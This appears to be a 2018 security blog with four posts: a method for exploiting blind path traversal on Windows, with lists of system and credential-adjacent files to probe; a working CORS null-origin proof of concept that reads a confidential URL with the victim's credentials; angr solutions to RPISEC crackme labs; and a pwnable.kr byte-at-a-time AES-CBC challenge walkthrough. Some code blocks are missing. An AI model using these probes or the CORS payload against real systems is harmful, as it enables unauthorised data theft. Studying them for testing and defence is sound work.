Tuesday, 19 June 2018

Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems

In a recent engagement I was confronted with a blind path traversal vulnerability on a server running with the Microsoft Windows operating system. That is, it was not possible to display folder contents but the complete file name and path had to be guessed. Due to the lack of a comprehensive website I was forced to gather information from various different sources.

In this blog post, I want to summarize my findings and focus on the exploitation of  this kind of vulnerability.
Admittedly, vanilla path traversal vulnerabilities have become somewhat rare and Microsoft Windows as a server operating system is also more of an exception than the rule. However, in an XXE scenario, you may encounter a similar situation.
Also, this post will not shed light on the detection of this vulnerability - which is an art in itself and has already been thoroughly documented. In a nutshell, the key to the successful detection is to guess the correct path of a world-readable file (with the correct encoding).

Identifying vulnerable Applications


On Microsoft Windows, the following files are good choices since they are present in almost every version:

c:\windows\system.ini
c:\windows\win.ini

Assuming you have successfully identified a path traversal vulnerability, the only question is how further it can be escalated. The major obstacle is that you usually have to know in advance the exact location of the files you want to read. As opposed to *nix-based operating systems, the locations can differ significantly from one Windows installation to another. For instance, the main system drive letter may not be C: or the user name may differ from the standard Administrator.

First and foremost, we have to recall a few key characteristics of Windows operating systems:
  • Files and directories are handled case-insensitive: From an attacker perspective, our life will be easier since we only have to probe one variation of a given location. For example it suffices to test for ../../windows/win.ini instead of attempting also ../../WINDOWS/win.ini.
  • Forward and backward slashes can most of the times be used interchangeably; e.g., ../..\../windows/win.ini is a valid file path in Windows.

Determining the Privilege Level of the reading Process


In order to assess the severity of a path traversal bug, you should determine the privilege level of the process that peforms the file retrieval. From an attacker perspective, the process should ideally run with elevated privileges, i.e. by LocalSystem (= root equivalent) or by a member of the Administrators group.

If you can successfully retrieve one of the following files, you are at least a member of the Administrators group:


  • c:/documents and settings/administrator/ntuser.ini
  • c:/documents and settings/administrator/desktop/desktop.ini
  • c:/users/administrator/desktop/desktop.ini
  • c:/users/administrator/ntuser.ini


As already mentioned, there is a catch to this approach - there might be no such user account. In this case, you have to guess the name of an administrator account.

In contrast, the following files should be available on all modern Windows operating systems and are independent from the set up:


  • c:/system volume information/wpsettings.dat
  • C:/Windows/CSC/v2.0.6/pq
  • C:/Windows/CSC/v2.0.6/sm
  • C:/$Recycle.Bin/S-1-5-18/desktop.ini


If you can read either of these files, the file reading process has LocalSystem privileges.

Determining the Windows Version


Moreover, you should determine the exact version of Microsoft Windows. On Linux this is again far more simple, since we can read files such as the following:

  • /etc/issue
  • /etc/*release
  • /proc/version


Up until Windows 10, there is a similar file also containing version information, namely at

  • c:/windows/system32/license.rtf

It is also present on Windows 10, but it does not contain version information (which can also be used as a blind indicator). 
The best way is, however, to retrieve a Microsoft-compiled executable from the target system and analyze the included version information in the "file properties" tab.  Possible candidates are:

  • c:/windows/explorer.exe
  • c:/windows/notepad.exe
  • c:/windows/system32/ntoskrnl.exe

Afterwards, you can consulting the following table for looking up the corresponding operating system version:

  • 10.0 = Windows 10 / Windows Server 2016
  • 6.3 = Windows 8.1 / Windows Server 2012 R2
  • 6.2 = Windows 8 / Windows Server 2012
  • 6.1 = Windows 7 / Windows Server 2008 R2
  • 6.0 = Windows Vista / Windows Server 2008
  • 5.2 = Windows XP 64 Bit / Windows Server 2003
  • 5.1 = Windows XP
  • 5.0 = Windows 2000
  • 4.0 = Windows NT 4

Instead of the file properties tab, you can also use the peinfo package for Python to analyze the version number as follows:



Finetuning



To exploit the full potential of the path traversal vulnerability, you will likely have to perform an educated brute-force or dictionary attack, as the "interesting" files are technology-dependent.

The following list may be helpful as a first step and I would appreciate any additions or comments to this list:

https://github.com/soffensive/windowsblindread


References and follow-up links:

Web Application Hacker's Handbook, 2nd Edition
 https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
https://github.com/mubix/post-exploitation-wiki/blob/master/windows/files.md
http://pwnwiki.io/#!presence/windows/blind.md
https://blog.netspi.com/smb-attacks-through-directory-traversal/
https://digi.ninja/blog/when_all_you_can_do_is_read.php
https://superuser.com/questions/363018/how-do-i-tell-what-version-and-edition-of-windows-is-on-the-filesystem
https://docs.microsoft.com/en-us/windows/desktop/sysinfo/operating-system-version
https://docs.microsoft.com/en-us/windows/desktop/api/verrsrc/ns-verrsrc-tagvs_fixedfileinfo
https://stackoverflow.com/questions/1264472/using-the-pefile-py-to-get-file-exe-version

Monday, 23 April 2018

Exploiting misconfigured CORS Null Origin

Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited.

Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header:

Origin: null

the server would respond with the following two HTTP headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data-url as follows:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>

Although the code above gives a hint to the right direction, it omits a complete proof of concept. I struggled to find code that would work across the browsers Chrome and Firefox, but eventually succeeded with the following snippet:

<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
    if (xhr.readyState === xhr.DONE) {
            console.log(xhr.response);
    }
};
xhr.send(null);
</script>'></iframe>

</body>

As soon as the page from above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the corresponding HTTP response should be shown in the browser console.

Wednesday, 21 February 2018

Using angr and symbolic execution for reverse engineering challenges (RPI MBE Labs)

This blog posts will highlight how you can utilize the angr dynamic binary analysis framework and symbolic execution for reverse engineering tasks.

More precisely, we will look at the first two tasks in the lab1 of the RPISEC MBE labs.

While angr's internals are quite complex and require substantial effort for mastering, getting started for our simple examples requires not too much knowledge.  

The first example we will look at is lab1C from lab01, which requires the user to enter a certain password:

./lab1C
-----------------------------
--- RPISEC - CrackMe v1.0 ---
-----------------------------

Password: bluab

Invalid Password!!!

When inspecting the program's disassembly, we see the system() function is initialized and called from address 0x08048711 onwards:

Disassembly of lab1C:

   0x080486ad <+0>: push   ebp
   0x080486ae <+1>: mov    ebp,esp
   0x080486b0 <+3>: and    esp,0xfffffff0
   0x080486b3 <+6>: sub    esp,0x20
   0x080486b6 <+9>: mov    DWORD PTR [esp],0x80487d0
   0x080486bd <+16>: call   0x8048560 <puts@plt>
   0x080486c2 <+21>: mov    DWORD PTR [esp],0x80487ee
   0x080486c9 <+28>: call   0x8048560 <puts@plt>
   0x080486ce <+33>: mov    DWORD PTR [esp],0x80487d0
   0x080486d5 <+40>: call   0x8048560 <puts@plt>
   0x080486da <+45>: mov    DWORD PTR [esp],0x804880c
   0x080486e1 <+52>: call   0x8048550 <printf@plt>
   0x080486e6 <+57>: lea    eax,[esp+0x1c]
   0x080486ea <+61>: mov    DWORD PTR [esp+0x4],eax
   0x080486ee <+65>: mov    DWORD PTR [esp],0x8048818
   0x080486f5 <+72>: call   0x80485a0 <__isoc99_scanf@plt>
   0x080486fa <+77>: mov    eax,DWORD PTR [esp+0x1c]
   0x080486fe <+81>: cmp    eax,0x149a
   0x08048703 <+86>: jne    0x8048724 <main+119>
   0x08048705 <+88>: mov    DWORD PTR [esp],0x804881b
   0x0804870c <+95>: call   0x8048560 <puts@plt>
   0x08048711 <+100>: mov    DWORD PTR [esp],0x804882b
   0x08048718 <+107>: call   0x8048570 <system@plt>
   0x0804871d <+112>: mov    eax,0x0
   0x08048722 <+117>: jmp    0x8048735 <main+136>
   0x08048724 <+119>: mov    DWORD PTR [esp],0x8048833
   0x0804872b <+126>: call   0x8048560 <puts@plt>
   0x08048730 <+131>: mov    eax,0x1
   0x08048735 <+136>: leave  
   0x08048736 <+137>: ret    

Without looking further at the program logic, we have enough information to create a little script that will invoke angr and let us help with the challenge:




The main part of angr that is relevant to us is the SimulationManager object that guides the symbolic execution engine. We specify that we want to find an execution that reaches address 0x08048711 and start the symbolic execution of the program. After an execution has reached the address, we are interested in the input that led to the satisfying execution, which we can retrieve by specifying the file descriptor of stdin, which is 0.
Within a few seconds, the following output is generated:

python solve-lab1C.py
WARNING | 2018-02-21 13:12:01,239 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups.
WARNING | 2018-02-21 13:12:02,652 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.
We found a satisfying input: +0000005274

While the program lab1C just compares the input to a hard-coded value, lab1B is a little bit more complicated. For the user it looks the same as lab1B, as a password has to be provided:

./lab1B 
.---------------------------.
|-- RPISEC - CrackMe v2.0 --|
'---------------------------'

Password: asas

Invalid Password!

Again, we first have a look at its disassembly, in particular the decrypt function:

Dump of assembler code for function decrypt:
   0x080489b7 <+0>: push   ebp
   0x080489b8 <+1>: mov    ebp,esp
   0x080489ba <+3>: sub    esp,0x38
   0x080489bd <+6>: mov    eax,gs:0x14
   0x080489c3 <+12>: mov    DWORD PTR [ebp-0xc],eax
   0x080489c6 <+15>: xor    eax,eax
   0x080489c8 <+17>: mov    DWORD PTR [ebp-0x1d],0x757c7d51
   0x080489cf <+24>: mov    DWORD PTR [ebp-0x19],0x67667360
   0x080489d6 <+31>: mov    DWORD PTR [ebp-0x15],0x7b66737e
   0x080489dd <+38>: mov    DWORD PTR [ebp-0x11],0x33617c7d
   0x080489e4 <+45>: mov    BYTE PTR [ebp-0xd],0x0
   0x080489e8 <+49>: push   eax
   0x080489e9 <+50>: xor    eax,eax
   0x080489eb <+52>: je     0x80489f0 <decrypt+57>
   0x080489ed <+54>: add    esp,0x4
   0x080489f0 <+57>: pop    eax
   0x080489f1 <+58>: lea    eax,[ebp-0x1d]
   0x080489f4 <+61>: mov    DWORD PTR [esp],eax
   0x080489f7 <+64>: call   0x8048810 <strlen@plt>
   0x080489fc <+69>: mov    DWORD PTR [ebp-0x24],eax
   0x080489ff <+72>: mov    DWORD PTR [ebp-0x28],0x0
   0x08048a06 <+79>: jmp    0x8048a28 <decrypt+113>
   0x08048a08 <+81>: lea    edx,[ebp-0x1d]
   0x08048a0b <+84>: mov    eax,DWORD PTR [ebp-0x28]
   0x08048a0e <+87>: add    eax,edx
   0x08048a10 <+89>: movzx  eax,BYTE PTR [eax]
   0x08048a13 <+92>: mov    edx,eax
   0x08048a15 <+94>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048a18 <+97>: xor    eax,edx
   0x08048a1a <+99>: lea    ecx,[ebp-0x1d]
   0x08048a1d <+102>: mov    edx,DWORD PTR [ebp-0x28]
   0x08048a20 <+105>: add    edx,ecx
   0x08048a22 <+107>: mov    BYTE PTR [edx],al
   0x08048a24 <+109>: add    DWORD PTR [ebp-0x28],0x1
   0x08048a28 <+113>: mov    eax,DWORD PTR [ebp-0x28]
   0x08048a2b <+116>: cmp    eax,DWORD PTR [ebp-0x24]
   0x08048a2e <+119>: jb     0x8048a08 <decrypt+81>
   0x08048a30 <+121>: mov    DWORD PTR [esp+0x4],0x8048d03
   0x08048a38 <+129>: lea    eax,[ebp-0x1d]
   0x08048a3b <+132>: mov    DWORD PTR [esp],eax
   0x08048a3e <+135>: call   0x8048770 <strcmp@plt>
   0x08048a43 <+140>: test   eax,eax
   0x08048a45 <+142>: jne    0x8048a55 <decrypt+158>
   0x08048a47 <+144>: mov    DWORD PTR [esp],0x8048d14
   0x08048a4e <+151>: call   0x80487e0 <system@plt>
   0x08048a53 <+156>: jmp    0x8048a61 <decrypt+170>
   0x08048a55 <+158>: mov    DWORD PTR [esp],0x8048d1c
   0x08048a5c <+165>: call   0x80487d0 <puts@plt>
   0x08048a61 <+170>: mov    eax,DWORD PTR [ebp-0xc]
   0x08048a64 <+173>: xor    eax,DWORD PTR gs:0x14
   0x08048a6b <+180>: je     0x8048a72 <decrypt+187>
   0x08048a6d <+182>: call   0x80487c0 <__stack_chk_fail@plt>
   0x08048a72 <+187>: leave  
   0x08048a73 <+188>: ret    
End of assembler dump.

The goal of the program is here likewise the call of the system() function with a specific argument, starting from address 0x08048a47. The solving-script is thus almost identical to the previous example:

Running, however, requires more time due to the exploration of several if-conditions and checking their satisfiability:

python solve-lab1B.py 
WARNING | 2018-02-21 12:35:23,576 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups.
WARNING | 2018-02-21 12:35:25,180 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.
We found a satisfying input: +0322424827Z

Further examples that showcase applying angr to challenges of these kind are available on the Github repository of the angr developers.

Tuesday, 23 January 2018

pwnable.kr: crypto1 challenge

In the pwnable.kr challenge crypto1 in the rookies section, we are given the following two files client.py and server.py:



Furthermore, there is a running instance of client.py at pwnable.kr on port 9006. Our goal is to connect to this service and retrieve the flag.

We can infer from the two files the following facts:
  1. The only user-controlled inputs are the username and password strings.
  2. AES-128 (default) is used in CBC mode to encrypt the string "username-password-cookie".
  3. Before the plain text is processed by AES, it is padded with NULL values (\x00)
  4. The function request_auth() will show us for every supplied username and password the corresponding cipher text
  5. The password of a user is solely the SHA256 sum of the string "username"+"cookie" (+ denotes concatenation here). Thus, the password of a user is entirely dependent only on his username and the cookie value.
  6. The initialization vector is constant.
  7. We are given credentials for the user guest: guest / 8b465d23cb778d3636bf6c4c5e30d031675fd95cec7afea497d36146783fd3a1
  8. The flag will be read by client.py if and only if the return value retrieved from server.py is neither 0 or 1.
  9. The return value retrieved from server.py will only return a value different from 0 and 1 when the username is admin and the correct password is supplied for this user.
  10. As we know from (5), the password of admin can be computed once the secret cookie value is known.
  11. The username and password can only consist of values of the following character set:  '1234567890abcdefghijklmnopqrstuvwxyz-_'.
So there are numerous ways of approaching this challenge and it is definitely helpful to have a good understanding of common cryptographic engineering problems and pitfalls.
I initially thought about whether it would be possible to somehow infer information about the cookie from the provided credentials of the user "guest".

However, the key to the challenge is to utilize the cipher text oracle and perform a chosen-plaintext attack. Hence, we have to understand which parts of the input change the corresponding parts of the output. 

AES is a block cipher and operates on a block size of 16 bytes. Thus it is advisable to divide the cipher text into chunks of this size and choose different input parameters. Furthermore, we have to recall how our input is transformed BEFORE it is supplied as a plain text to the encryption routine.
The username is the first content of the plain text, followed by a single "-", the password, another "-" character and lastly the cookie.

When we choose for the username an input having at least 16 bytes, we note that the first 16 bytes of cipher text entirely depend on the username. For example, a username beginning with 16 'a' characters,  i.e. "aaaaaaaaaaaaaaaa", will always cause the first block of cipher text to be equal to "166827d3124ce5db2b36e803b9115a49", irrespective of the other characters of the username or the password.

When we choose exactly 15 times the character 'a' as the username, we know that the first 16 bytes of the actual plain text will be  "aaaaaaaaaaaaaaa-", since the encryption routine will append a trailing "-" as a delimiter between the username and password.
Similarly, when we choose exactly 14 times the character 'a' and an empty password, we know that the first 16 bytes of the actual plain text fed into AES will be "aaaaaaaaaaaaaa--". This is due to the fact that the password is empty and an additional "-" will be appended by the function "request_auth" as a delimiter between the password and the cookie.

Now we arrive at the point where the actual magic happens. What if we choose exactly 13 times the character "a" as the username and an empty password? As you correctly guessed, the function "request_auth" will append two "-" characters. Furthermore, it will append the first byte of the secret cookie value! 
Yet, as we only can see the cipher text, we do not know immediately the corresponding plain text. But we can save the 16 bytes of cipher text as a reference block and compute cipher text blocks for all possible values of the first cookie byte. As soon as the computed cipher text block is equal to the reference block, we know we have correctly guessed the cookie byte value! This whole procedure is also known as one-byte-at-a-time decryption. 

The details of the actual attack are a little bit more intricate, since we cannot directly compute cipher texts but have to rely on the "request_auth" function, which will append "-" characters. 
Concerning the guessing of the first cookie byte value, for the reference block we have to choose 13 times the character "-". For the subsequent  guesses, we will have to choose a username consisting of 15 times the character "-" and the 16th character will be the guessed cookie byte value.

You are highly encouraged to work out a fully working decryption routine yourself. Once you have completed it, try a variant of the attack by keeping the username value constant and alter instead the password value.
For the sake of completeness, here you have my proposed solution: